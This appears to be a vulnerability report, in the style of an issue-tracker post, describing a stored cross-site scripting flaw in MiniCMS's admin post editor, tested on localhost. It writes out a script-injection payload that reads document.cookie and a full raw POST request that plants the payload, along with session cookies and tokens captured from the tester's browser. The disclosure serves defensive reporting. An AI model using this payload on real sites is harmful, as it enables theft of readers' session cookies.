This is a stored XSS vulnerability
first,we shoud land (http://127.0.0.1/test/MiniCMS-master/mc-admin/)
writing articles and published an article
payload :"/><script>confirm(document.cookie)</script>
i think you can see the following picture to konw more.
This is a stored XSS vulnerability
first,we shoud land (http://127.0.0.1/test/MiniCMS-master/mc-admin/)
writing articles and published an article
payload :"/><script>confirm(document.cookie)</script>
i think you can see the following picture to konw more.
POST /test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf
Content-Type: application/x-www-form-urlencoded
Content-Length: 274
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6
Connection: keep-alive
Upgrade-Insecure-Requests: 1
IS_POST_BACK=&title="/><script>confirm(document.cookie)</script>&content="/><script>confirm(document.cookie)</script>&tags=&year=2018&month=04&day=22&hourse=11&minute=44&second=00&can_comment=1&state=publish&id=qhywyf&save=%E4%BF%9D%E5%AD%98

when we published the article and we can see it from homepage.

If people read our articles, we can easily get their cookie.

src=http://xxx.xxx.xxx.xxx/
The text was updated successfully, but these errors were encountered: